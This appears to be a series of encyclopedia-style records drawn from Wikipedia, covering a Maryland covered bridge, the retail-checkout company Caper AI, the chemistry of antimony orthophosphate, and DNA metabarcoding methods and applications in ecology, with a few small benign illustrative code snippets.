The bridge was originally constructed in 1860 by Ferdinand Wood and was substantially reconstructed in 1992. Foxcatcher Farm Covered Bridge was designated as a Maryland Historic Civil Engineering Landmark by the American Society of Civil Engineers in 1994.
See also
List of covered bridges in Maryland
References
External links
Big Elk Creek Covered Bridge, (Fair Hill Covered Bridge, Foxcatcher Farm Covered Bridge) at Maryland Historical Trust
Fair Hill Estate Historic District, (Fair Hill Natural Resources Management Area) at Maryland Historical Trust
Bridges in Cecil County, Maryland
Covered bridges in Maryland
Burr Truss bridges in the United States
Historic Civil Engineering Landmarks
Tourist attractions in Cecil County, Maryland
Wooden bridges in Maryland | Foxcatcher Farm Covered Bridge | [
"Engineering"
] | 246 | [
"Civil engineering",
"Historic Civil Engineering Landmarks"
] |
66,618,624 | https://en.wikipedia.org/wiki/Caper%20AI | Caper is a software technology company that develops and deploys AI-powered automated checkout devices as well as AI-based software applications for retailers, grocers, convenience stores and other general merchandising store formats. Caper AI was established in 2016 by Lindon Gao, York Yang, Yilin Huang and Ahmed Beshry. It is headquartered in Manhattan, New York.
In October 2021, American retail delivery company Instacart acquired Caper for $350 million.
History
The company was founded in 2016 by Lindon Gao, York Yang, Yilin Huang and Ahmed Beshry with its main office based in New York. Since its inception, the company has focused on the development of automated checkout software for grocery retailers. Caper AI closed its series A round of funding for US$10 million in 2019. In 2019, Sobeys, the second-largest food retailer in Canada, publicly announced the commercial deployment of Caper's Smart Cart technology, with its first location at Glen Abbey Sobeys supermarket in Oakville, Ontario. As Grocery Dive notes, "The novel coronavirus pandemic has accelerated the deployment of programs that help shoppers get in and get out from stores as quickly as possible". According to the Wall Street Journal and the Washington Post, Caper's technology started to roll out in US and Canadian grocery stores in 2019. The deployments include Foodcellar & Co., C-town, Met Fresh Market, Pioneer Supermarkets, Gala Fresh Farms and Brooklyn Fare, among others. In autumn 2020, the company introduced Caper Counter, a cashierless countertop for small grocery stores under 10,000 sq ft and fewer than 10,000 SKUs, with software applying machine learning algorithms, computer vision and sensor fusion technology.
In 2020, one of the largest American chain retailers, Kroger, launched "KroGo" AI-powered shopping carts developed by Caper AI. The pilot program was introduced at one of its stores in Cincinnati, Ohio. The grocery chains Schnucks, ShopRite, and Fairway Market all rolled out the AI-powered shopping carts in 2023.
In Fall 2024, Instacart launched Caper Carts internationally, with ALDI in Austria and Coles Supermarket in Australia.
Technology
Caper AI uses several technologies to automate the retail checkout process, including computer vision, machine learning and sensor fusion. Caper’s technology has multiple cameras and lights to capture images. AI and deep learning are used to pre-train the system to recognize products within the stores. The technology can recognize products that are visually similar or identical by differentiating between them based on textual information and size.
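Combining a camera classifier with a second sensor cue is a generic sensor-fusion pattern. The toy sketch below is not Caper's actual implementation, and all product names, scores, and weights are invented; it simply illustrates one common approach: reweighting a vision classifier's scores by how well each candidate's expected weight matches a scale reading, then renormalizing.

```python
import math

def fuse_scores(vision_scores, expected_weight, measured_weight, tol=20.0):
    """Toy sensor fusion: scale each vision score by a Gaussian-style
    likelihood of the measured weight, then renormalize to probabilities."""
    fused = {
        item: p * math.exp(-((measured_weight - expected_weight[item]) / tol) ** 2)
        for item, p in vision_scores.items()
    }
    total = sum(fused.values())
    return {item: s / total for item, s in fused.items()}

# Two visually similar (invented) products that differ mainly in weight.
vision = {"cola_330ml": 0.5, "cola_500ml": 0.5}   # ambiguous camera output
weights = {"cola_330ml": 350.0, "cola_500ml": 520.0}  # expected weights, grams
result = fuse_scores(vision, weights, measured_weight=515.0)
# result["cola_500ml"] is now close to 1.0: the scale resolves the ambiguity
```

The design point is that each sensor contributes a likelihood, so a cue the camera cannot see (weight) can break ties between lookalike products.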
See also
Automated retail
Cashless society
Amazon Go
Self-checkout
References
Technology companies of the United States
Technology companies based in New York (state)
Retail processes and techniques
Automation organizations
Payment systems
Payment methods in retailing
Artificial intelligence companies
2021 mergers and acquisitions | Caper AI | [
"Engineering"
] | 593 | [
"Automation organizations",
"Automation"
] |
66,618,956 | https://en.wikipedia.org/wiki/Antimony%20orthophosphate | Antimony phosphate, (also called antimony orthophosphate, or antimonous phosphate) is a chemical compound of antimony and phosphate with formula . Antimony is in the form Sb(III) with +3 oxidation state. Antimony atoms have a lone pair of electrons.
Layered form
occurs as a layered compound. Two-dimensional layers are weakly held together by electrostatic forces. is one of the most compressible materials, and under pressure compresses more perpendicular to the layers. At standard conditions crystallises in a monoclinic form with space group P21/m. Antimony phosphate has been investigated for use in lithium ion and sodium ion batteries.
Antimony atoms are attached to four oxygen atoms. These atoms are arranged as a squarish pyramid with antimony at the apex. Antimony atoms form the top and bottom of the layers. Four oxygen atoms are arranged tetrahedrally around phosphorus. Antimony-to-oxygen bond lengths are 1.98, 2.04, 2.18 and 2.93 Å; the O-Sb-O angles are 87.9, 164.8, 84.1 and 85.0°. The structure of differs from two forms of BiPO4, where bismuth associates with five or eight phosphate groups.
In the 31P chemical shift is −18 ppm. The binding energy of the 2p electrons of phosphorus atom as determined by XPS is 133.9 eV.
When the pressure exceeds 3 GPa, bonds form between the layers, but it retains the monoclinic system. When the pressure is between 9 and 20 GPa, it transitions to a triclinic form with space group P.
The infrared spectrum shows absorption bands at 1145, 1052, 973, 664, 590, 500, 475, and 372 cm−1. These are due to vibrations in P-O and Sb-O bonds and also bending in O-P-O bonds.
Antimony(V) phosphate
Antimony(V) phosphate has monoclinic crystals. It has space group C2c. The unit cell has dimensions a = 6.791 Å, b = 8.033 Å, c = 7.046 Å, and β = 115.90°, with Z = 4 formula units per cell. It is formed by heating and . At 1218 K it loses oxygen to become antimony(III) phosphate.
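For a monoclinic lattice the cell volume follows directly from the quoted parameters as V = a·b·c·sin β, and Z then gives the volume per formula unit. A short sketch (the numerical results are computed from the cell parameters above, not taken from a source):

```python
import math

def monoclinic_volume(a, b, c, beta_deg):
    """Unit-cell volume of a monoclinic lattice: V = a * b * c * sin(beta)."""
    return a * b * c * math.sin(math.radians(beta_deg))

# Cell parameters quoted for antimony(V) phosphate (lengths in angstroms).
v_cell = monoclinic_volume(6.791, 8.033, 7.046, 115.90)  # ~346 cubic angstroms
v_formula = v_cell / 4  # Z = 4 formula units per cell -> ~86 cubic angstroms each
```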
Formation
may be formed by soaking antimonous oxide in pure phosphoric acid and then filtering the solid, and heating to 600 °C.
A related method involves heating a water solution of phosphoric acid with antimonous oxide at about 120 °C.
Yet another procedure involves heating diammonium phosphate with antimonous oxide at 600 °C.
Reactions
reacts with bases such as ammonia, hydrazine and ethylenediamine to form and hydrogenphosphate salts.
However, intercalation is also claimed with amines. Intercalation of amines expands the a axis of the crystals, but leaves the b and c dimensions unaltered. The β angle is reduced. This is due to a bilayer of molecules inserting between each layer in the original crystal.
There are also double salts where phosphate groups are joined to antimony.
List
References
Phosphates
Antimony(III) compounds | Antimony orthophosphate | [
"Chemistry"
] | 700 | [
"Phosphates",
"Salts"
] |
66,619,486 | https://en.wikipedia.org/wiki/Metabarcoding | Metabarcoding is the barcoding of DNA/RNA (or eDNA/eRNA) in a manner that allows for the simultaneous identification of many taxa within the same sample. The main difference between barcoding and metabarcoding is that metabarcoding does not focus on one specific organism, but instead aims to determine species composition within a sample.
A barcode consists of a short variable gene region (for example, see different markers/barcodes) which is useful for taxonomic assignment flanked by highly conserved gene regions which can be used for primer design. This idea of general barcoding originated in 2003 from researchers at the University of Guelph.
The metabarcoding procedure, like general barcoding, proceeds in order through stages of DNA extraction, PCR amplification, sequencing and data analysis. Different genes are used depending on whether the aim is to barcode a single species or to metabarcode several species; in the latter case, a more universal gene is used. Metabarcoding does not use single-species DNA/RNA as a starting point, but DNA/RNA from several different organisms derived from one environmental or bulk sample.
Environmental DNA
Environmental DNA or eDNA describes the genetic material present in environmental samples such as sediment, water, and air, including whole cells, extracellular DNA and potentially whole organisms. eDNA can be captured from environmental samples and preserved, extracted, amplified, sequenced, and categorized based on its sequence. From this information, detection and classification of species is possible. eDNA may come from skin, mucous, saliva, sperm, secretions, eggs, feces, urine, blood, roots, leaves, fruit, pollen, and rotting bodies of larger organisms, while microorganisms may be obtained in their entirety. eDNA production is dependent on biomass, age and feeding activity of the organism as well as physiology, life history, and space use.
By 2019 methods in eDNA research had been expanded to be able to assess whole communities from a single sample. This process involves metabarcoding, which can be precisely defined as the use of general or universal polymerase chain reaction (PCR) primers on mixed DNA samples from any origin followed by high-throughput next-generation sequencing (NGS) to determine the species composition of the sample. This method has been common in microbiology for years, but, as of 2020, it is only just finding its footing in the assessment of macroorganisms. Ecosystem-wide applications of eDNA metabarcoding have the potential to not only describe communities and biodiversity, but also to detect interactions and functional ecology over large spatial scales, though it may be limited by false readings due to contamination or other errors. Altogether, eDNA metabarcoding increases speed, accuracy, and identification over traditional barcoding and decreases cost, but needs to be standardized and unified, integrating taxonomy and molecular methods for full ecological study.
eDNA metabarcoding has applications to diversity monitoring across all habitats and taxonomic groups, ancient ecosystem reconstruction, plant-pollinator interactions, diet analysis, invasive species detection, pollution responses, and air quality monitoring. eDNA metabarcoding is a unique method still in development and will likely remain in flux for some time as technology advances and procedures become standardized. However, as metabarcoding is optimized and its use becomes more widespread, it is likely to become an essential tool for ecological monitoring and global conservation study.
Community DNA
Since the inception of high-throughput sequencing (HTS), the use of metabarcoding as a biodiversity detection tool has drawn immense interest. However, there has yet to be clarity regarding what source material is used to conduct metabarcoding analyses (e.g., environmental DNA versus community DNA). Without clarity between these two source materials, differences in sampling, as well as differences in laboratory procedures, can impact subsequent bioinformatics pipelines used for data processing, and complicate the interpretation of spatial and temporal biodiversity patterns. It is therefore important to differentiate among the prevailing source materials and their effects on downstream analysis and interpretation, comparing environmental DNA metabarcoding of animals and plants with community DNA metabarcoding.
With community DNA metabarcoding of animals and plants, the targeted groups are most often collected in bulk (e.g., soil, malaise trap or net), and individuals are removed from other sample debris and pooled together prior to bulk DNA extraction. In contrast, macro‐organism eDNA is isolated directly from an environmental material (e.g., soil or water) without prior segregation of individual organisms or plant material from the sample and implicitly assumes that the whole organism is not present in the sample. Of course, community DNA samples may contain DNA from parts of tissues, cells and organelles of other organisms (e.g., gut contents, cutaneous intracellular or extracellular DNA). Likewise, macro‐organism eDNA samples may inadvertently capture whole microscopic nontarget organisms (e.g., protists, bacteria). Thus, the distinction can at least partly break down in practice.
Another important distinction between community DNA and macro-organism eDNA is that sequences generated from community DNA metabarcoding can be taxonomically verified when the specimens are not destroyed in the extraction process. Here, sequences can then be generated from voucher specimens using Sanger sequencing. As the samples for eDNA metabarcoding lack whole organisms, no such in situ comparisons can be made. Taxonomic affinities can therefore only be established by directly comparing obtained sequences (or bioinformatically generated molecular operational taxonomic units, MOTUs) to sequences that are taxonomically annotated, such as NCBI's GenBank nucleotide database, BOLD, or self-generated reference databases from Sanger-sequenced DNA. (A MOTU is a group identified through use of cluster algorithms and a predefined percentage sequence similarity, for example, 97%.) Then, to at least partially corroborate the resulting list of taxa, comparisons are made with conventional physical, acoustic or visual-based survey methods conducted at the same time, or with historical records from surveys for a location (see Table 1).
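The MOTU clustering mentioned above can be illustrated with a toy greedy algorithm in Python. This is a deliberately simplified sketch, not any real pipeline tool (those use alignment-aware similarity and dedicated software); the sequences and the 97% threshold are illustrative.

```python
def percent_identity(a: str, b: str) -> float:
    """Fraction of matching positions between two pre-aligned, equal-length sequences."""
    assert len(a) == len(b), "toy example assumes pre-aligned sequences"
    return sum(x == y for x, y in zip(a, b)) / len(a)

def cluster_motus(seqs, threshold=0.97):
    """Greedy clustering: each sequence joins the first cluster whose seed
    it matches at >= threshold identity, otherwise it seeds a new cluster."""
    clusters = []  # list of (seed sequence, member list)
    for s in seqs:
        for seed, members in clusters:
            if percent_identity(s, seed) >= threshold:
                members.append(s)
                break
        else:
            clusters.append((s, [s]))
    return clusters

# Toy 20-bp "barcodes": the second differs from the first at 1 of 20 positions
# (95% identity), so under a 97% threshold it seeds its own MOTU.
reads = ["ACGTACGTACGTACGTACGT",
         "ACGTACGTACGTACGTACGA",
         "ACGTACGTACGTACGTACGT"]
motus = cluster_motus(reads)
print(len(motus))  # 2 MOTUs
```

Real clustering additionally handles sequences of unequal length, sequencing errors and chimeras, which this sketch ignores.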
The difference in source material between community DNA and eDNA therefore has distinct ramifications for interpreting the scale of inference in time and space about the biodiversity detected. From community DNA, it is clear that the individual species were found in that time and place. For eDNA, however, the organism that produced the DNA may be upstream from the sampled location, the DNA may have been transported in the faeces of a more mobile predatory species (e.g., birds depositing fish eDNA), or the organism may have been previously present but no longer active in the community, with detection coming from DNA that was shed years to decades before. The latter means that the scale of inference, both in space and in time, must be considered carefully when inferring the presence of a species in the community based on eDNA.
Metabarcoding stages
There are six stages or steps in DNA barcoding and metabarcoding. The DNA barcoding of animals (and specifically of bats) is used as an example in the diagram at the right and in the discussion immediately below.
First, suitable DNA barcoding regions are chosen to answer some specific research question. The most commonly used DNA barcode region for animals is a segment about 600 base pairs long of the mitochondrial gene cytochrome oxidase I (CO1). This locus provides large sequence variation between species yet a relatively small amount of variation within species. Other barcode regions commonly used for species identification of animals are ribosomal DNA (rDNA) regions such as 16S, 18S and 12S, and mitochondrial regions such as cytochrome B. These markers have advantages and disadvantages and are used for different purposes. Longer barcode regions (at least 600 base pairs long) are often needed for accurate species delimitation, especially to differentiate close relatives. Identification of the producer of organismal remains such as faeces, hair and saliva can be used as a proxy measure to verify the absence/presence of a species in an ecosystem. The DNA in these remains is usually of low quality and quantity, and therefore shorter barcodes of around 100 base pairs long are used in these cases. Similarly, DNA in dung is often degraded as well, so short barcodes are needed to identify the prey consumed.
Second, a reference database needs to be built of all DNA barcodes likely to occur in a study. Ideally, these barcodes need to be generated from vouchered specimens deposited in a publicly accessible place, such as for instance a natural history museum or another research institute. Building up such reference databases is currently being done all over the world. Partner organizations collaborate in international projects such as the International Barcode of Life Project (iBOL) and Consortium for the Barcode of Life (CBOL), aiming to construct a DNA barcode reference that will be the foundation for DNA‐based identification of the world's biome. Well‐known barcode repositories are NCBI GenBank and the Barcode of Life Data System (BOLD).
Third, the cells containing the DNA of interest must be broken open to expose their DNA. This step, DNA extraction and purification, should be performed on the substrate under investigation. There are several procedures available for this. Specific techniques must be chosen to isolate DNA from substrates with partly degraded DNA, for example fossil samples, and from samples containing inhibitors, such as blood, faeces and soil. Extractions in which DNA yield or quality is expected to be low should be carried out in an ancient-DNA facility, following established protocols to avoid contamination with modern DNA. Experiments should always be performed in duplicate and with positive controls included.
Fourth, amplicons have to be generated from the extracted DNA, either from a single specimen or from complex mixtures, with primers based on the DNA barcodes selected in step 1. In the case of metabarcoding, labelled nucleotides (molecular IDs or MID labels) need to be added to keep track of the amplicons' origin. These labels are needed later in the analyses to trace reads from a bulk data set back to their origin.
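Tracing pooled reads back to their source sample via MID labels amounts to a demultiplexing step, which can be sketched as follows. This is a toy illustration: the tag sequences and sample names are invented, and real MID tags are longer and designed to tolerate sequencing errors.

```python
# Hypothetical 4-bp MID tags mapped to the samples they label.
MID_TO_SAMPLE = {
    "ACGT": "bat_roost_A",
    "TGCA": "bat_roost_B",
}

def demultiplex(reads, tag_len=4):
    """Group reads by their leading MID tag and strip the tag from each read."""
    by_sample = {name: [] for name in MID_TO_SAMPLE.values()}
    unassigned = []
    for r in reads:
        sample = MID_TO_SAMPLE.get(r[:tag_len])
        if sample is None:
            unassigned.append(r)          # tag unreadable, e.g. sequencing error
        else:
            by_sample[sample].append(r[tag_len:])
    return by_sample, unassigned

reads = ["ACGTTTAGGC", "TGCAGGCCTA", "NNNNTTAGGC"]
samples, lost = demultiplex(reads)
print(len(samples["bat_roost_A"]), len(lost))  # 1 1
```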
Fifth, the appropriate technique should be chosen for DNA sequencing. The classic Sanger chain-termination method relies on the selective incorporation of chain-terminating dideoxynucleotides by DNA polymerase during DNA replication; the resulting fragments, each ending in one of the four terminator bases, are separated by size using electrophoresis and identified by laser detection. The Sanger method can produce only a single read at a time and is therefore suitable for generating DNA barcodes from substrates that contain only a single species. Emerging technologies such as nanopore sequencing have reduced the cost of DNA sequencing from about USD 30,000 per megabase in 2002 to about USD 0.60 in 2016. Modern next-generation sequencing (NGS) technologies can handle thousands to millions of reads in parallel and are therefore suitable for mass identification of a mix of different species present in a substrate, summarized as metabarcoding.
Finally, bioinformatic analyses need to be carried out to match the DNA barcodes obtained with Barcode Index Numbers (BINs) in reference libraries. Each BIN, or BIN cluster, can be identified to species level when it shows high (>97%) concordance with DNA barcodes linked to a species present in a reference library, or, when taxonomic identification to the species level is still lacking, to an operational taxonomic unit (OTU), which refers to a group of species (i.e. a genus, family or higher taxonomic rank). (See binning (metagenomics).) The results of the bioinformatics pipeline must be pruned, for example by filtering out unreliable singletons, superfluous duplicates, low-quality reads and/or chimeric reads. This is generally done by carrying out serial BLAST searches in combination with automatic filtering and trimming scripts. Standardized thresholds are needed to discriminate between different species, and between correct and incorrect identifications.
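The species-level assignment with a >97% concordance threshold can be sketched as a best-hit lookup against a reference library. This is a toy illustration: the reference sequences and species names are fabricated, and real assignment uses alignment tools such as BLAST rather than position-by-position comparison.

```python
# Fabricated reference library of 20-bp "barcodes" for illustration only.
REFERENCE = {
    "Myotis daubentonii": "ACGTACGTACGTACGTACGT",
    "Myotis mystacinus":  "ACGTACGTACGTTCGTACGA",
}

def identity(a: str, b: str) -> float:
    """Fraction of matching positions between two equal-length sequences."""
    return sum(x == y for x, y in zip(a, b)) / len(a)

def assign(query, threshold=0.97):
    """Return (species, identity) for the best reference hit,
    or None if the best hit falls below the concordance threshold."""
    name, ref = max(REFERENCE.items(), key=lambda kv: identity(query, kv[1]))
    pid = identity(query, ref)
    return (name, pid) if pid >= threshold else None

print(assign("ACGTACGTACGTACGTACGT"))  # ('Myotis daubentonii', 1.0)
print(assign("T" * 20))                # None — no confident match
```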
Metabarcoding workflow
Despite the obvious power of the approach, eDNA metabarcoding is affected by precision and accuracy challenges distributed throughout the workflow in the field, in the laboratory and at the keyboard. As set out in the diagram at the right, following the initial study design (hypothesis/question, targeted taxonomic group, etc.), the current eDNA workflow consists of three components: field, laboratory and bioinformatics. The field component consists of sample collection (e.g., water, sediment, air) that is preserved or frozen prior to DNA extraction. The laboratory component has four basic steps: (i) DNA is concentrated (if not performed in the field) and purified, (ii) PCR is used to amplify a target gene or region, (iii) unique nucleotide sequences called "indexes" (also referred to as "barcodes") are incorporated using PCR or are ligated (bound) onto different PCR products, creating a "library" whereby multiple samples can be pooled together, and (iv) pooled libraries are then sequenced on a high-throughput machine. The final step after laboratory processing of samples is to computationally process the output files from the sequencer using a robust bioinformatics pipeline.
OTUs and the species concept
Method and visualisation
The method requires each collected DNA to be archived with its corresponding "type specimen" (one for each taxon), in addition to the usual collection data. These types are stored in specific institutions (museums, molecular laboratories, universities, zoological gardens, botanical gardens, herbaria, etc.), one for each country; in some cases, the same institution is assigned to hold the types of more than one country, where some nations do not have the technology or financial resources to do so.
In this way, the creation of type specimens of genetic codes represents a methodology parallel to that carried out by traditional taxonomy.
In a first stage, the region of the DNA that would be used to make the barcode was defined. It had to be short and achieve a high percentage of unique sequences. For animals, algae and fungi, a portion of a mitochondrial gene coding for subunit 1 of the cytochrome oxidase enzyme (CO1), a region of around 648 base pairs, has provided a high percentage of unique sequences (95%).
In the case of plants, the use of CO1 has not been effective, since they have low levels of variability in that region, in addition to the difficulties produced by the frequent effects of polyploidy, introgression and hybridization, so the chloroplast genome seems more suitable.
Applications
Pollinator networks
The diagram on the right shows a comparison of pollination networks based on DNA metabarcoding with more traditional networks based on direct observations of insect visits to plants. By detecting numerous additional hidden interactions, metabarcoding data largely alters the properties of the pollination networks compared to visit surveys. Molecular data shows that pollinators are much more generalist than expected from visit surveys. However, pollinator species were composed of relatively specialized individuals and formed functional groups highly specialized upon floral morphs.
As a consequence of the ongoing global changes, a dramatic and parallel worldwide decline in pollinators and animal-pollinated plant species has been observed. Understanding the responses of pollination networks to these declines is urgently required to diagnose the risks the ecosystems may incur as well as to design and evaluate the effectiveness of conservation actions. Early studies on animal pollination dealt with simplified systems, i.e. specific pairwise interactions or involved small subsets of plant-animal communities. However, the impacts of disturbances occur through highly complex interaction networks and, nowadays, these complex systems are currently a major research focus. Assessing the true networks (determined by ecological process) from field surveys that are subject to sampling effects still provides challenges.
Recent research studies have clearly benefited from network concepts and tools to study the interaction patterns in large species assemblages. They showed that plant-pollinator networks are highly structured, deviating significantly from random associations. Commonly, networks have (1) a low connectance (the realized fraction of all potential links in the community), suggesting a low degree of generalization; (2) a high nestedness, in which the more specialist species interact only with proper subsets of those species interacting with the more generalist ones; (3) a cumulative distribution of connectivity (number of links per species, s) that follows a power or truncated power-law function, characterized by a few supergeneralists with more links than expected by chance and many specialists; and (4) a modular organization. A module is a group of plant and pollinator species that exhibits high levels of within-module connectivity and that is poorly connected to species of other groups.
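Connectance, the first of the properties listed above, is straightforward to compute from a visit matrix. The following minimal sketch uses an invented plant–pollinator data set purely for illustration.

```python
# Hypothetical plant -> observed-pollinator records for a tiny network.
visits = {
    "orchid":  {"bee"},
    "thistle": {"bee", "hoverfly", "butterfly"},
    "clover":  {"bee", "butterfly"},
}

# Connectance = realized links / all possible plant x pollinator pairs.
pollinators = set().union(*visits.values())
links = sum(len(p) for p in visits.values())
connectance = links / (len(visits) * len(pollinators))
print(round(connectance, 2))  # 6 realized of 9 possible links -> 0.67
```

As the surrounding text notes, such a value is sensitive to sampling: unobserved rare interactions lower the measured connectance and inflate apparent specialization.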
The low level of connectivity and the high proportion of specialists in pollination networks contrast with the view that generalization, rather than specialization, is the norm in networks. Indeed, most plant species are visited by a diverse array of pollinators which exploit floral resources from a wide range of plant species. A main cause evoked to explain this apparent contradiction is the incomplete sampling of interactions. Indeed, most network properties are highly sensitive to sampling intensity and network size. Network studies are basically phytocentric, i.e. based on the observations of pollinator visits to flowers. This plant-centered approach nevertheless suffers from inherent limitations which may hamper the comprehension of mechanisms contributing to community assembly and biodiversity patterns. First, direct observations of pollinator visits to certain taxa such as orchids are often scarce, and rare interactions are very difficult to detect in the field in general. Pollinator and plant communities usually are composed of a few abundant species and many rare species that are poorly recorded in visit surveys. These rare species appear as specialists, whereas in fact they could be typical generalists. Because of the positive relationship between interaction frequency (f) and connectivity (s), undersampled interactions may lead to overestimating the degree of specialization in networks. Second, network analyses have mostly operated at the species level. Networks have very rarely been upscaled to functional groups or downscaled to individual-based networks, and most such studies have focused on one or two species only. The behavior of either individuals or colonies is commonly ignored, although it may influence the structure of the species networks.
Third, flower visitors are by no means always effective pollinators as they may deposit no conspecific pollen and/or a lot of heterospecific pollen. Animal-centered approaches based on the investigation of pollen loads on visitors and plant stigmas may be more efficient at revealing plant-pollinator interactions.
Disentangling food webs
Metabarcoding offers new opportunities for deciphering trophic linkages between predators and their prey within food webs. Compared to traditional, time-consuming methods, such as microscopic or serological analyses, the development of DNA metabarcoding allows the identification of prey species without prior knowledge of the predator's prey range. In addition, metabarcoding can also be used to characterize a large number of species in a single PCR reaction, and to analyze several hundred samples simultaneously. Such an approach is increasingly used to explore the functional diversity and structure of food webs in agroecosystems. Like other molecular-based approaches, metabarcoding only gives qualitative results on the presence/absence of prey species in gut or fecal samples. However, this knowledge of the identity of prey consumed by predators of the same species in a given environment provides a "pragmatic and useful surrogate for truly quantitative information".
In food web ecology, "who eats whom" is a fundamental issue for gaining a better understanding of the complex trophic interactions existing between pests and their natural enemies within a given ecosystem. The dietary analysis of arthropod and vertebrate predators allows the identification of key predators involved in the natural control of arthropod pests and gives insights into the breadth of their diet (generalist vs. specialist) and intraguild predation.
The diagram on the right summarises results from a 2020 study which used metabarcoding to untangle the functional diversity and structure of the food web associated with a couple of millet fields in Senegal. After assigning the identified OTUs to species, 27 arthropod prey taxa were identified from nine arthropod predators. The mean number of prey taxa detected per sample was highest in carabid beetles, ants and spiders, and lowest in the remaining predators, including anthocorid bugs, pentatomid bugs and earwigs. Across predatory arthropods, a high diversity of arthropod prey was observed in spiders, carabid beetles, ants and anthocorid bugs. In contrast, the diversity of prey species identified in earwigs and pentatomid bugs was relatively low. Lepidoptera, Hemiptera, Diptera and Coleoptera were the most common insect prey taxa detected from predatory arthropods.
Conserving functional biodiversity and related ecosystem services, especially by controlling pests using their natural enemies, offers new avenues to tackle challenges for the sustainable intensification of food production systems. Predation of crop pests by generalist predators, including arthropods and vertebrates, is a major component of natural pest control. A particularly important trait of most generalist predators is that they can colonize crops early in the season by first feeding on alternative prey. However, the breadth of the "generalist" diet entails some drawbacks for pest control, such as intra-guild predation. A tuned diagnosis of diet breadth in generalist predators, including predation of non-pest prey, is thus needed to better disentangle food webs (e.g., exploitation competition and apparent competition) and ultimately to identify key drivers of natural pest control in agroecosystems. However, the importance of generalist predators in the food web is generally difficult to assess, due to the ephemeral nature of individual predator–prey interactions. The only conclusive evidence of predation results from direct observation of prey consumption, identification of prey residues within predators’ guts, and analyses of regurgitates or feces.
Marine biosecurity
The spread of non-indigenous species (NIS) represents significant and increasing risks to ecosystems. In marine systems, NIS that survive the transport and adapt to new locations can have significant adverse effects on local biodiversity, including the displacement of native species, and shifts in biological communities and associated food webs. Once NIS are established, they are extremely difficult and costly to eradicate, and further regional spread may occur through natural dispersal or via anthropogenic transport pathways. While vessel hull fouling and ships’ ballast waters are well known as important anthropogenic pathways for the international spread of NIS, comparatively little is known about the potential of regionally transiting vessels to contribute to the secondary spread of marine pests through bilge water translocation.
Recent studies have revealed that the water and associated debris entrained in bilge spaces of small vessels (<20 m) can act as a vector for the spread of NIS at regional scales. Bilge water is defined as any water that is retained on a vessel (other than ballast), and that is not deliberately pumped on board. It can accumulate on or below the vessel’s deck (e.g., under floor panels) through a variety of mechanisms, including wave actions, leaks, via the propeller stern glands, and through the loading of items such as diving, fishing, aquaculture or scientific equipment. Bilge water, therefore, may contain seawater as well as living organisms at various life stages, cell debris and contaminants (e.g., oil, dirt, detergent, etc.), all of which are usually discharged using automatic bilge pumps or are self-drained using duckbill valves. Bilge water pumped from small vessels (manually or automatically) is not usually treated prior to discharge to sea, contrasting with larger vessels that are required to separate oil and water using filtration systems, centrifugation, or carbon absorption. If propagules are viable through this process, the discharge of bilge water may result in the spread of NIS.
In 2017, Fletcher et al. used a combination of laboratory and field experiments to investigate the diversity, abundance, and survival of biological material contained in bilge water samples taken from small coastal vessels. Their laboratory experiment showed that ascidian colonies or fragments, and bryozoan larvae, can survive passage through an unfiltered pumping system largely unharmed. They also conducted the first morpho-molecular assessment (using eDNA metabarcoding) on the biosecurity risk posed by bilge water discharges from 30 small vessels (sailboats and motorboats) of various origins and sailing time. Using eDNA metabarcoding they characterised approximately three times more taxa than via traditional microscopic methods, including the detection of five species recognised as non-indigenous in the study region.
To assist in understanding the risks associated with different NIS introduction vectors, traditional microscope biodiversity assessments are increasingly being complemented by eDNA metabarcoding. This allows a wide range of diverse taxonomic assemblages, at many life stages, to be identified. It can also enable the detection of NIS that may have been overlooked using traditional methods. Despite the great potential of eDNA metabarcoding tools for broad-scale taxonomic screening, a key challenge for eDNA in the context of environmental monitoring of marine pests, particularly when monitoring enclosed environments such as some bilge spaces or ballast tanks, is differentiating dead and viable organisms. Extracellular DNA can persist in dark/cold environments for extended periods of time (months to years), thus many of the organisms detected using eDNA metabarcoding may not have been viable in the location of sample collection for days or weeks. In contrast, ribonucleic acid (RNA) deteriorates rapidly after cell death, likely providing a more accurate representation of viable communities. Recent metabarcoding studies have explored the use of co-extracted eDNA and eRNA molecules for monitoring benthic sediment samples around marine fish farms and oil drilling sites, and have collectively found slightly stronger correlations between biological and physico-chemical variables along impact gradients when using eRNA. From a marine biosecurity perspective, the detection of living NIS may represent a more serious and immediate threat than detection of NIS based purely on a DNA signal. Environmental RNA may therefore offer a useful method for identifying living organisms in samples.
Miscellaneous
The construction of the genetic barcode library was initially focused on fish and birds, followed by butterflies and other invertebrates. In the case of birds, the DNA sample is usually obtained from the chest.
Researchers have already developed specific catalogs for large animal groups, such as bees, birds, mammals or fish. Another use is to analyze the complete zoocenosis of a given geographic area, such as the "Polar Life Bar Code" project that aims to collect the genetic traits of all organisms that live in the polar regions, at both poles of the Earth. A related application is the coding of all the ichthyofauna of a hydrographic basin, for example the one that began to be developed in the Rio São Francisco, in the northeast of Brazil.
The potential uses of barcodes are very wide: the discovery of numerous cryptic species (the method has already yielded numerous positive results), the identification of species at any stage of their life, the secure identification of protected species that are illegally trafficked, and so on.
It has also been used as a non-invasive tool to determine the diet of wildlife species, such as wombats and particularly critically endangered species, such as the northern hairy-nosed wombat (Lasiorhinus krefftii).
Potentials and shortcomings
Potentials
DNA barcoding has been proposed as a way to distinguish species suitable even for non-specialists to use.
Shortcomings
In general, the shortcomings for DNA barcoding are valid also for metabarcoding. One particular drawback for metabarcoding studies is that there is no consensus yet regarding the optimal experimental design and bioinformatics criteria to be applied in eDNA metabarcoding. However, there are current joined attempts, such as the COST network DNAqua-Net of the European Cooperation in Science and Technology, to move forward by exchanging experience and knowledge to establish best-practice standards for biomonitoring.
The so-called barcode is a region of mitochondrial DNA within the gene for cytochrome c oxidase. A database, Barcode of Life Data Systems (BOLD), contains DNA barcode sequences from over 190,000 species. However, scientists such as Rob DeSalle have expressed concern that classical taxonomy and DNA barcoding, which they consider a misnomer, need to be reconciled, as they delimit species differently. Genetic introgression mediated by endosymbionts and other vectors can further make barcodes ineffective in the identification of species.
Status of barcode species
In microbiology, genes can move freely even between distantly related bacteria, possibly extending to the whole bacterial domain. As a rule of thumb, microbiologists have assumed that kinds of Bacteria or Archaea with 16S ribosomal RNA gene sequences more similar than 97% to each other need to be checked by DNA-DNA hybridisation to decide if they belong to the same species or not. This concept was narrowed in 2006 to a similarity of 98.7%.
DNA-DNA hybridisation is outdated, and results have sometimes led to misleading conclusions about species, as with the pomarine and great skua. Modern approaches compare sequence similarity using computational methods.
See also
Barcode of Life Data System (BOLD)
Consortium for the Barcode of Life (CBOL)
International Nucleotide Sequence Database Collaboration (INSDC)
Molecular marker
